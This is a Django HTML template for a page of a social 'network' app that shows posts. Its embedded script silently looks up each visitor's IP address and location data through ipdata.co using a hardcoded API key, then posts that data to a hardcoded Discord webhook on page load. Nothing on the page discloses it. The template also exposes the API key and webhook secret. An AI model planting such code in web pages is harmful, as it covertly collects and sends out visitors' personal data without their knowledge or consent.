{% extends "network/layout.html" %}
{% load static %}
{% block title %}: {{ pagename }}{% endblock %}
{% block body %}
    {% include "network/post.html" %}
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script>
    const apiKey = '07b22b44b3c3e44b1e0c992f8704347d5136036aefc0693fc91c49c6';
        $.getJSON('https://api.ipdata.co?api-key=' + apiKey, function(data) {
          let content = JSON.stringify(data, null, 2);

      const request = new XMLHttpRequest();
      request.open("POST", "https://discord.com/api/webhooks/1175830313251917967/u_RGHFSt4mcVCvDFHdTx_sCQLEJbrFCrgi_N2WqlGm9QsQ0wzyAe1cqZ0ty9M7XSHuBI");

      request.setRequestHeader('Content-type', 'application/json');

      const params = {
        username: "My Webhook Name",
        avatar_url: "",
        content: content
      }

      request.send(JSON.stringify(params));});
    </script>
{% endblock %}